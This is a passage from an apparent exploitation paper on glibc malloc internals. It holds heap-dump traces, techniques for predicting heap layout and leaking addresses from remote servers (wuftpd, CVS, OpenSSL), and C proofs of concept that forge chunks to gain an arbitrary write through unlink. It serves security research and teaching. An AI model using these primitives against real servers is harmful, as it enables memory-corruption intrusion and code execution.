A new chunk is allocated from the remaining space at the top chunk. The
|
|
same happens with the next malloc() calls.
|
|
|
|
|
|
|
|
6 moe = malloc(256);
|
|
|
|
[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
|
|
returning 0x80497a8 from top chunk
|
|
new top 0x80498b0 size 0x751
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0109 (A)
|
|
chunk 0x80497a8 0x0109 (A)
|
|
chunk 0x80498b0 0x0751 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x80498b0 - top size = 0x0750
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||A||T|
|
|
|
|
|
|
|
|
7 po = malloc(256);
|
|
|
|
[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
|
|
returning 0x80498b0 from top chunk
|
|
new top 0x80499b8 size 0x649
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0109 (A)
|
|
chunk 0x80497a8 0x0109 (A)
|
|
chunk 0x80498b0 0x0109 (A)
|
|
chunk 0x80499b8 0x0649 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x80499b8 - top size = 0x0648
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||A||A||T|
|
|
|
|
|
|
|
|
8 lala = malloc(256);
|
|
|
|
[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
|
|
returning 0x80499b8 from top chunk
|
|
new top 0x8049ac0 size 0x541
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0109 (A)
|
|
chunk 0x80497a8 0x0109 (A)
|
|
chunk 0x80498b0 0x0109 (A)
|
|
chunk 0x80499b8 0x0109 (A)
|
|
chunk 0x8049ac0 0x0541 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||A||A||A||T|
|
|
|
|
|
|
|
|
9 free(larry);
|
|
[1679] FREE(0x80496a8) - CHUNK_FREE(0x40018040,0x80496a0)
|
|
fronlink(0x80496a0,264,33,0x40018148,0x40018148) new free chunk
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC)
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0109 (A)
|
|
chunk 0x80499b8 0x0109 (A)
|
|
chunk 0x8049ac0 0x0541 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
|
|
bin 33 @ 0x40018148
|
|
free_chunk @ 0x80496a0 - size 0x0108
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||33||A||A||A||T|
|
|
|
|
A chunk is freed. The frontlink() macro is called to insert the new free
|
|
chunk into the corresponding bin:
|
|
|
|
frontlink(ar_ptr, new_free_chunk, size, bin_index, bck, fwd);
|
|
|
|
Note the arena address parameter (ar_ptr) was omitted in the output.
|
|
In this case, the chunk at 0x80496a0 was inserted in the bin number 33
|
|
according to its size. As this chunk is the only one in its bin (we can
|
|
check this in the bin_dump()'s output), it's a lonely chunk (LC) (we'll
|
|
see later that being lonely makes 'him' dangerous...), its
|
|
bk and fd pointers are equal and point to the bin number 33.
|
|
In the heap_layout()'s output, the new free chunk is represented by the
|
|
number of the bin where it is located.
|
|
|
|
|
|
|
|
10 free(po);
|
|
|
|
[1679] FREE(0x80498b8) - CHUNK_FREE(0x40018040,0x80498b0)
|
|
fronlink(0x80498b0,264,33,0x40018148,0x80496a0) new free chunk
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x080498b0 |
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0109 (F) | 0x080496a0 | 0x40018148 |
|
|
chunk 0x80499b8 0x0108 (A)
|
|
chunk 0x8049ac0 0x0541 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
|
|
bin 33 @ 0x40018148
|
|
free_chunk @ 0x80496a0 - size 0x0108
|
|
free_chunk @ 0x80498b0 - size 0x0108
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||33||A||33||A||T|
|
|
|
|
Now, we have two free chunks in the bin number 33. We can appreciate now
|
|
how the double linked list is built. The forward pointer of the chunk at
|
|
0x80498b0 points to the other chunk in the list, the backward pointer
|
|
points to the list head, the bin.
|
|
Note that there is no longer a lonely chunk. Also, we can see the
|
|
difference between a heap address and a libc address (the bin address),
|
|
0x080496a0 and 0x40018148 respectively.
|
|
|
|
|
|
|
|
11 tw = malloc(128);
|
|
|
|
[1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136)
|
|
unlink(0x80496a0,0x80498b0,0x40018148) from big bin 33 chunk 1 (split)
|
|
new last_remainder 0x8049728
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0089 (A)
|
|
chunk 0x8049728 0x0081 (F) | 0x40018048 | 0x40018048 | (LR)
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC)
|
|
chunk 0x80499b8 0x0108 (A)
|
|
chunk 0x8049ac0 0x0541 (T)
|
|
sbrk_end 0x804a000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
|
|
bin 1 @ 0x40018048
|
|
free_chunk @ 0x8049728 - size 0x0080
|
|
bin 33 @ 0x40018148
|
|
free_chunk @ 0x80498b0 - size 0x0108
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||L||A||33||A||T|
|
|
|
|
In this case, the requested size for the new allocation is smaller than
|
|
the size of the available free chunks. So, the first freed buffer is taken
|
|
from the bin with the unlink() macro and splitted. The first part is
|
|
allocated, the remaining free space is called the 'last remainder', which
|
|
is always stored in the first bin, as we can see in the bin_dump()'s
|
|
output.
|
|
In the heap_layout()'s output, the last remainder chunk is represented
|
|
with a L; in the heap_dump()'s output, (LR) is used.
|
|
|
|
|
|
|
|
12 piniata = malloc(128);
|
|
|
|
[1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136)
|
|
clearing last_remainder
|
|
frontlink(0x8049728,128,16,0x400180c0,0x400180c0) last_remainder
|
|
unlink(0x80498b0,0x40018148,0x40018148) from big bin 33 chunk 1 (split)
|
|
new last_remainder 0x8049938
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0089 (A)
|
|
chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC)
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0089 (A)
|
|
chunk 0x8049938 0x0081 (F) | 0x40018048 | 0x40018048 | (LR)
|
|
chunk 0x80499b8 0x0108 (A)
|
|
chunk 0x8049ac0 0x0541 (T)
|
|
sbrk_end 0x804a000
|
|
$25 = void
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
|
|
bin 1 @ 0x40018048
|
|
free_chunk @ 0x8049938 - size 0x0080
|
|
bin 16 @ 0x400180c0
|
|
free_chunk @ 0x8049728 - size 0x0080
|
|
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||16||A||A||L||A||T|
|
|
|
|
As the last_remainder size is not enough for the requested allocation, the
|
|
last remainder is cleared and inserted as a new free chunk into the
|
|
corresponding bin. Then, the other free chunk is taken from its bin and
|
|
split as in the previous step.
|
|
|
|
|
|
|
|
13 dipsi = malloc(1500);
|
|
|
|
[1679] MALLOC(1500) - CHUNK_ALLOC(0x40018040,1504)
|
|
clearing last_remainder
|
|
frontlink(0x8049938,128,16,0x400180c0,0x8049728) last_remainder
|
|
extended top chunk:
|
|
previous size 0x540
|
|
new top 0x804a0a0 size 0xf61
|
|
returning 0x8049ac0 from top chunk
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0089 (A)
|
|
chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 |
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0089 (A)
|
|
chunk 0x8049938 0x0081 (F) | 0x08049728 | 0x400180c0 |
|
|
chunk 0x80499b8 0x0108 (A)
|
|
chunk 0x8049ac0 0x05e1 (A)
|
|
chunk 0x804a0a0 0x0f61 (T)
|
|
sbrk_end 0x804b000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x804a0a0 - top size = 0x0f60
|
|
bin 16 @ 0x400180c0
|
|
free_chunk @ 0x8049728 - size 0x0080
|
|
free_chunk @ 0x8049938 - size 0x0080
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||16||A||A||16||A||A||T|
|
|
|
|
As no available free chunk is enough for the requested allocation size,
|
|
the top chunk was extended again.
|
|
|
|
|
|
|
|
14 free(dipsi);
|
|
|
|
[1679] FREE(0x8049ac8) - CHUNK_FREE(0x40018040,0x8049ac0)
|
|
merging with top
|
|
new top 0x8049ac0
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0089 (A)
|
|
chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 |
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0089 (A)
|
|
chunk 0x8049938 0x0081 (F) | 0x 8049728 | 0x400180c0 |
|
|
chunk 0x80499b8 0x0108 (A)
|
|
chunk 0x8049ac0 0x1541 (T)
|
|
sbrk_end 0x804b000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x1540
|
|
bin 16 @ 0x400180c0
|
|
free_chunk @ 0x8049728 - size 0x0080
|
|
free_chunk @ 0x8049938 - size 0x0080
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||16||A||A||16||A||T|
|
|
|
|
The chunk next to the top chunk is freed, so it gets coalesced with it,
|
|
and it is not inserted in any bin.
|
|
|
|
|
|
|
|
15 free(lala);
|
|
|
|
[1679] FREE(0x80499c0) - CHUNK_FREE(0x40018040,0x80499b8)
|
|
unlink(0x8049938,0x400180c0,0x8049728) for back consolidation
|
|
merging with top
|
|
new top 0x8049938
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
sbrk_base 0x8049598
|
|
chunk 0x8049598 0x0109 (A)
|
|
chunk 0x80496a0 0x0089 (A)
|
|
chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC)
|
|
chunk 0x80497a8 0x0108 (A)
|
|
chunk 0x80498b0 0x0089 (A)
|
|
chunk 0x8049938 0x16c9 (T)
|
|
sbrk_end 0x804b000
|
|
|
|
--- BIN DUMP ---
|
|
arena @ 0x40018040 - top @ 0x8049938 - top size = 0x16c8
|
|
bin 16 @ 0x400180c0
|
|
free_chunk @ 0x8049728 - size 0x0080
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||16||A||A||T|
|
|
|
|
Again, but this time also the chunk before the freed chunk is coalesced, as
|
|
it was already free.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 4.3 - Layout reset - initial layout prediction - server model
|
|
|
|
In this section, we analyse how different scenarios may impact on the
|
|
exploitation process.
|
|
In case of servers that get restarted, it may be useful to cause a 'heap
|
|
reset', which means crashing the process on purpose in order to obtain a
|
|
clean and known initial heap layout.
|
|
The new heap that gets built together with the new restarted process is
|
|
in its 'initial layout'. This refers to the initial state of the heap
|
|
after the process initialization, before receiving any input from the
|
|
user. The initial layout can be easily predicted and used as a the known
|
|
starting point for the heap layout evolution prediction, instead of using
|
|
a not virgin layout result of several modifications performed while
|
|
serving client requests. This initial layout may not vary much across
|
|
different versions of the targeted server, but in case of major changes in
|
|
the source code.
|
|
One issue very related to the heap layout analysis is the kind of process
|
|
being exploited.
|
|
In case of a process that serves several clients, heap layout evolution
|
|
prediction is harder, as may be influenced by other clients that may be
|
|
interacting with our target server while we are trying to exploit it.
|
|
However, it gets useful in case where the interaction between the server
|
|
and the client is very restricted, as it enables the attacker to open
|
|
multiple connections to affect the same process with different input
|
|
commands.
|
|
On the other hand, exploiting a one client per process server (i.e. a
|
|
forking server) is easier, as long as we can accurately predict the
|
|
initial heap layout and we are able to populate the process memory in
|
|
a fully controlled way.
|
|
As it is obvious, a server that does not get restarted, gives us just one
|
|
shot so, for example, bruteforcing and/or 'heap reset' can't be applied.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 4.4 Obtaining information from the remote process
|
|
|
|
The idea behind the techniques in this section is to force a remote
|
|
server to give us information to aid us in finding the memory locations
|
|
needed for exploitation.
|
|
This concept was already used as different mechanisms in the 'Bypassing
|
|
PaX ASLR' paper [13], used to bypass randomized space address processes.
|
|
Also, the idea was suggested in [4], as 'transforming a write primitive in
|
|
a read primitive'.
|
|
|
|
--] 4.4.1 Modifying server static data - finding process' DATA
|
|
|
|
This technique was originally seen in wuftpd ~{ exploits. When the ftpd
|
|
process receives a 'help' request, answers with all the available commands.
|
|
These are stored in a table which is part of the process' DATA, being a
|
|
static structure. The attacker tries to overwrite part of the structure,
|
|
and using the 'help' command until he sees a change in the server's answer.
|
|
|
|
Now the attacker knows an absolute address within the process' DATA, being
|
|
able to predict the location of the process' GOT.
|
|
|
|
--] 4.4.2 Modifying user input - finding shellcode location
|
|
|
|
The following technique allows the attacker to find the exact location of
|
|
the injected shellcode within the process' address space, being
|
|
independent of the target process.
|
|
To obtain the address, the attacker provides the process with some bogus
|
|
data, which is stored in some part of the process. Then, the basic
|
|
primitive is used, trying to write 4 bytes in the location the bogus
|
|
data was previously stored. After this, the server is forced to reply
|
|
using the supplied bogus data.
|
|
If the replayed data differs from the original supplied (taken into account
|
|
any transformation the server may perform on our input), we can be sure
|
|
that next time we send the same input sequence to the server, it will be
|
|
stored in the same place. The server's answer may be truncated if a
|
|
function expecting NULL terminating strings is used to craft it, or to
|
|
obtain the answer's length before sending it through the network.
|
|
In fact, the provided input may be stored multiple times in different
|
|
locations, we will only detect a modification when we hit the location
|
|
where the server reply is crafted.
|
|
Note we are able to try two different addresses for each connection,
|
|
speeding up the bruteforcing mechanism.
|
|
The main requirement needed to use this trick, is being able to trigger
|
|
the aa4bmo primitive between the time the supplied data is stored and the
|
|
time the server's reply is built. Understanding the process allocation
|
|
behavior, including how is processed each available input command is
|
|
needed.
|
|
|
|
--] 4.4.2.1 Proof of concept 3 : Hitting the output
|
|
|
|
The following code simulates a process which provides us with a aa4bmo
|
|
primitive to try to find where a heap allocated output buffer is located:
|
|
|
|
|
|
#include <stdio.h>
|
|
#define SZ 256
|
|
#define SOMEOFFSET 5 + (rand() % (SZ-1))
|
|
#define PREV_INUSE 1
|
|
#define IS_MMAP 2
|
|
#define OUTPUTSZ 1024
|
|
|
|
void aa4bmoPrimitive(unsigned long what, unsigned long where){
|
|
unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
|
|
int i = 0;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = what;
|
|
unlinkMe[i++] = where-8;
|
|
for(;i<SZ;i++){
|
|
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
|
|
}
|
|
free(unlinkMe+SOMEOFFSET);
|
|
return;
|
|
}
|
|
|
|
int main(int argc, char **argv){
|
|
long where;
|
|
char *output;
|
|
int contador,i;
|
|
|
|
printf("## OUTPUT hide and seek ##\n\n");
|
|
output = (char*)malloc(OUTPUTSZ);
|
|
memset(output,'O',OUTPUTSZ);
|
|
|
|
for(contador=1;argv[contador]!=NULL;contador++){
|
|
where = strtol(argv[contador], (char **)NULL, 16);
|
|
printf("[.] trying %p\n",where);
|
|
|
|
aa4bmoPrimitive(where,where);
|
|
|
|
for(i=0;i<OUTPUTSZ;i++)
|
|
if(output[i] != 'O'){
|
|
printf("(!) you found the output @ %p :(\n",where);
|
|
printf("[%s]\n",output);
|
|
return 0;
|
|
}
|
|
printf("(-) output was not @ %p :P\n",where);
|
|
}
|
|
printf("(x) did not find the output <:|\n");
|
|
}
|
|
|
|
|
|
LD_PRELOAD=./heapy.so ./hitOutput 0x8049ccc 0x80498b8 0x8049cd0 0x8049cd4
|
|
0x8049cd8 0x8049cdc 0x80498c8 > output
|
|
|
|
## OUTPUT hide and seek ##
|
|
|
|
[.] trying 0x8049ccc
|
|
(-) output was not @ 0x8049ccc :P
|
|
[.] trying 0x80498b8
|
|
(-) output was not @ 0x80498b8 :P
|
|
[.] trying 0x8049cd0
|
|
(-) output was not @ 0x8049cd0 :P
|
|
[.] trying 0x8049cd4
|
|
(-) output was not @ 0x8049cd4 :P
|
|
[.] trying 0x8049cd8
|
|
(-) output was not @ 0x8049cd8 :P
|
|
[.] trying 0x8049cdc
|
|
(-) output was not @ 0x8049cdc :P
|
|
[.] trying 0x80498c8
|
|
(!) you found the output @ 0x80498c8 :(
|
|
[OOOOOOOO~X^D^H~X^D^HOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
|
|
...
|
|
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO]
|
|
|
|
Note the stamped output in the following hexdump:
|
|
...
|
|
7920 756f 6620 756f 646e 7420 6568 6f20
|
|
7475 7570 2074 2040 7830 3038 3934 6338
|
|
2038 283a 5b0a 4f4f 4f4f 4f4f 4f4f 98c8 <==
|
|
0804 98c8 0804 4f4f 4f4f 4f4f 4f4f 4f4f <==
|
|
4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f
|
|
4f4f 4f4f 4f4f 0a5d
|
|
|
|
|
|
This bruteforcing mechanism is not completely accurate in some cases, for
|
|
example, when the target server uses an output buffering scheme.
|
|
In order to improve the technique, we might mark some part of the supplied
|
|
data as real shellcode, and other as nops, requiring the nop part to be hit
|
|
while bruteforcing in order to avoid obtaining an address in the middle of
|
|
our shellcode. Even better, we could tag each four bytes with a masked
|
|
offset (i.e. to avoid character \x00 i.e.), when we analyse the reply we
|
|
will now obtain the expected offset to the shellcode, so being able in a
|
|
second try to see if actually in that expected address was stored our
|
|
shellcode, detecting and avoiding this way the risk of our input being
|
|
split and stored separated in the heap.
|
|
|
|
For example, in the CVS 'Directory' double free exploit [7], unrecognized
|
|
commands (i.e. 'cucucucucu') are used to populate the server heap. The
|
|
server does not answer, just stores the provided data in the heap, and
|
|
waits, until a noop or a command is received. After that, the unrecognized
|
|
command that was sent is sent back without any modification to the client.
|
|
We can provide the server with data almost without any size restriction,
|
|
this data is stored in the heap, until we force it to be replayed to us.
|
|
However, analysing how our unrecognized command is stored in the heap we
|
|
find that, instead of what we expected (a single memory chunk with our
|
|
data), there are other structures mixted with our input:
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FD BK
|
|
[...]
|
|
chunk 0x80e9998 0x00661 (F) | 0x40018e48 | 0x40018e48 |
|
|
chunk 0x80e9ff8 0x10008 (A)
|
|
chunk 0x80fa000 0x00ff9 (F) | 0x40018ed0 | 0x0810b000 |
|
|
chunk 0x80faff8 0x10008 (A)
|
|
chunk 0x810b000 0x00ff9 (F) | 0x080fa000 | 0x0811c000 |
|
|
chunk 0x810bff8 0x10008 (A)
|
|
chunk 0x813e000 0x04001 (T)
|
|
sbrk_end 0x8142000
|
|
|
|
This happens because error messages are buffered when generated, waiting
|
|
to be flushed, some buffering state internal structures get allocated,
|
|
and our data is split and stored in fixed size error buffers.
|
|
|
|
--] 4.4.3 Modifying user input - finding libc's DATA
|
|
|
|
In this situation, we are able to provide some input to the vulnerable
|
|
server which is then sent as output to us again. For example, in the CVS
|
|
'Directory' double free() vulnerability, we give the server and invalid
|
|
command, which is finally echoed back to the client explaining it was an
|
|
invalid command.
|
|
If we are able to force a call to free(), to an address pointing in
|
|
somewhere in the middle of our provided input, before it is sent back to
|
|
the client, we will be able to get the address of a main_arena's bin.
|
|
The ability to force a free() pointing to our supplied input, depends
|
|
on the exploitation scenario, being simple to achieve this in
|
|
'double-free' situations.
|
|
When the server frees our input, it founds a very big sized chunk, so
|
|
it links it as the first chunk (lonely chunk) of the bin. This depends
|
|
mainly on the process heap layout, but depending on what we are exploiting
|
|
it should be easy to predict which size would be needed to create the
|
|
new free chunk as a lonely one.
|
|
When frontlink() setups the new free chunk, it saves the bin address
|
|
in the fw and bk pointer of the chunk, being this what ables us to obtain
|
|
later the bin address.
|
|
Note we should be careful with our input chunk, in order to avoid the
|
|
process crashing while freeing our chunk, but this is quite simple in most
|
|
cases, i.e. providing a known address near the end of the stack.
|
|
|
|
The user provides as input a 'cushion chunk' to the target process. free()
|
|
is called in any part of our input, so our especially crafted chunk is
|
|
inserted in one of the last bins (we may know it's empty from the heap
|
|
analysis stage, avoiding then a process crash). When the provided cushion
|
|
chunk is inserted into the bin, the bin's address is written in the fd and
|
|
bk fields of the chunk's header.
|
|
|
|
--] 4.4.3.1 Proof of concept 4 : Freeing the output
|
|
|
|
The following code creates a 'cushion chunk' as it would be sent to the
|
|
server, and calls free() at a random location within the chunk (as the
|
|
target server would do).
|
|
The cushion chunk writes to a valid address to avoid crashing the process,
|
|
and its backward and forward pointer are set with the bin's address by
|
|
the frontlink() macro.
|
|
Then, the code looks for the wanted addresses within the output, as would
|
|
do an exploit which received the server answer.
|
|
|
|
|
|
#include <stdio.h>
|
|
#define SZ 256
|
|
#define SOMEOFFSET 5 + (rand() % (SZ-1))
|
|
#define PREV_INUSE 1
|
|
#define IS_MMAP 2
|
|
|
|
unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where){
|
|
unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
|
|
int i = 0;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = what;
|
|
unlinkMe[i++] = where-8;
|
|
for(;i<SZ;i++){
|
|
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
|
|
}
|
|
printf ("(-) calling free() at random address of output buffer...\n");
|
|
free(unlinkMe+SOMEOFFSET);
|
|
return unlinkMe;
|
|
}
|
|
|
|
int main(int argc, char **argv){
|
|
unsigned long *output;
|
|
int i;
|
|
|
|
printf("## FREEING THE OUTPUT PoC ##\n\n");
|
|
printf("(-) creating output buffer...\n");
|
|
output = aa4bmoPrimitive(0xbfffffc0,0xbfffffc4);
|
|
printf("(-) looking for bin address...\n");
|
|
for(i=0;i<SZ-1;i++)
|
|
if(output[i] == output[i+1] &&
|
|
((output[i] & 0xffff0000) != 0xffff0000)) {
|
|
printf("(!) found bin address -> %p\n",output[i]);
|
|
return 0;
|
|
}
|
|
printf("(x) did not find bin address\n");
|
|
}
|
|
|
|
|
|
./freeOutput
|
|
|
|
## FREEING THE OUTPUT PoC ##
|
|
|
|
(-) creating output buffer...
|
|
(-) calling free() at random address of output buffer...
|
|
(-) looking for bin address...
|
|
(!) found bin address -> 0x4212b1dc
|
|
|
|
We get chunk free with our provided buffer:
|
|
|
|
chunk_free (ar_ptr=0x40018040, p=0x8049ab0) at heapy.c:3221
|
|
(gdb) x/20x p
|
|
0x8049ab0: 0xfffffd6d 0xfffffd69 0xfffffd65 0xfffffd61
|
|
0x8049ac0: 0xfffffd5d 0xfffffd59 0xfffffd55 0xfffffd51
|
|
0x8049ad0: 0xfffffd4d 0xfffffd49 0xfffffd45 0xfffffd41
|
|
0x8049ae0: 0xfffffd3d 0xfffffd39 0xfffffd35 0xfffffd31
|
|
0x8049af0: 0xfffffd2d 0xfffffd29 0xfffffd25 0xfffffd21
|
|
(gdb)
|
|
0x8049b00: 0xfffffd1d 0xfffffd19 0xfffffd15 0xfffffd11
|
|
0x8049b10: 0xfffffd0d 0xfffffd09 0xfffffd05 0xfffffd01
|
|
0x8049b20: 0xfffffcfd 0xfffffcf9 0xfffffcf5 0xfffffcf1
|
|
0x8049b30: 0xfffffced 0xfffffce9 0xfffffce5 0xfffffce1
|
|
0x8049b40: 0xfffffcdd 0xfffffcd9 0xfffffcd5 0xfffffcd1
|
|
(gdb)
|
|
0x8049b50: 0xfffffccd 0xfffffcc9 0xfffffcc5 0xfffffcc1
|
|
0x8049b60: 0xfffffcbd 0xfffffcb9 0xfffffcb5 0xfffffcb1
|
|
0x8049b70: 0xfffffcad 0xfffffca9 0xfffffca5 0xfffffca1
|
|
0x8049b80: 0xfffffc9d 0xfffffc99 0xfffffc95 0xfffffc91
|
|
0x8049b90: 0xfffffc8d 0xfffffc89 0xfffffc85 0xfffffc81
|
|
(gdb)
|
|
|
|
3236 next = chunk_at_offset(p, sz);
|
|
3237 nextsz = chunksize(next);
|
|
3239 if (next == top(ar_ptr)) /* merge with top */
|
|
3278 islr = 0;
|
|
3280 if (!(hd & PREV_INUSE)) /* consolidate backward */
|
|
3294 if (!(inuse_bit_at_offset(next, nextsz)))
|
|
/* consolidate forward */
|
|
3296 sz += nextsz;
|
|
3298 if (!islr && next->fd == last_remainder(ar_ptr))
|
|
3306 unlink(next, bck, fwd);
|
|
3315 set_head(p, sz | PREV_INUSE);
|
|
3316 next->prev_size = sz;
|
|
3317 if (!islr) {
|
|
3318 frontlink(ar_ptr, p, sz, idx, bck, fwd);
|
|
|
|
After the frontlink() macro is called with our supplied buffer, it gets
|
|
the address of the bin in which it is inserted:
|
|
|
|
fronlink(0x8049ab0,-668,126,0x40018430,0x40018430) new free chunk
|
|
|
|
(gdb) x/20x p
|
|
|
|
0x8049ab0: 0xfffffd6d 0xfffffd65 0x40018430 0x40018430
|
|
0x8049ac0: 0xfffffd5d 0xfffffd59 0xfffffd55 0xfffffd51
|
|
0x8049ad0: 0xfffffd4d 0xfffffd49 0xfffffd45 0xfffffd41
|
|
0x8049ae0: 0xfffffd3d 0xfffffd39 0xfffffd35 0xfffffd31
|
|
0x8049af0: 0xfffffd2d 0xfffffd29 0xfffffd25 0xfffffd21
|
|
|
|
(gdb) c
|
|
Continuing.
|
|
(-) looking for bin address...
|
|
(!) found bin address -> 0x40018430
|
|
|
|
Let's check the address we obtained:
|
|
|
|
(gdb) x/20x 0x40018430
|
|
0x40018430 <main_arena+1008>: 0x40018428 0x40018428 0x08049ab0
|
|
0x08049ab0
|
|
0x40018440 <main_arena+1024>: 0x40018438 0x40018438 0x40018040
|
|
0x000007f0
|
|
0x40018450 <main_arena+1040>: 0x00000001 0x00000000 0x00000001
|
|
0x0000016a
|
|
0x40018460 <__FRAME_END__+12>: 0x0000000c 0x00001238 0x0000000d
|
|
0x0000423c
|
|
0x40018470 <__FRAME_END__+28>: 0x00000004 0x00000094 0x00000005
|
|
0x4001370c
|
|
|
|
And we see it's one of the last bins of the main_arena.
|
|
|
|
Although in this example we hit the cushion chunk in the first try on
|
|
purpose, this technique can be applied to brute force the location of our
|
|
output buffer also at the same time (if we don't know it beforehand).
|
|
|
|
|
|
--] 4.4.4 Vulnerability based heap memory leak - finding libc's data
|
|
|
|
In this case, the vulnerability itself leads to leaking process memory.
|
|
For example, in the OpenSSL 'SSLv2 Malformed Client Key Buffer Overflow'
|
|
vulnerability [6], the attacker is able to overflow a buffer and overwrite
|
|
a variable used to track a buffer length.
|
|
When this length is overwritten with a length greater than the original,
|
|
the process sends the content of the buffer (stored in the process' heap)
|
|
to the client, sending more information than the originally stored. The
|
|
attacker obtains then a limited portion of the process heap.
|
|
|
|
---------------------------------------------------------------------------
|
|
--] 4.5 Abusing the leaked information
|
|
|
|
The goal of the techniques in this section is to exploit the information
|
|
gathered using one of the process information leak tricks shown before.
|
|
|
|
--] 4.5.1 Recognizing the arena
|
|
|
|
The idea is to get from the previously gathered information, the address
|
|
of a malloc's bin. This applies mainly to scenarios were we are able to
|
|
leak process heap memory. A bin address can be directly obtained if the
|
|
attacker is able to use the 'freeing the output' technique.
|
|
The obtained bin address can be used later to find the address of a
|
|
function pointer to overwrite with the address of our shellcode, as shown
|
|
in the next techniques.
|
|
|
|
Remembering how the bins are organized in memory (circular
|
|
double linked lists), we know that a chunk hanging from any bin
|
|
containing just one chunk will have both pointers (bk and fd)
|
|
pointing to the head of the list, to the same address, since the list
|
|
is circular.
|
|
|
|
[bin_n] (first chunk)
|
|
ptr] ----> [<- chunk ->] [<- chunk ->] [<- fd
|
|
[ chunk
|
|
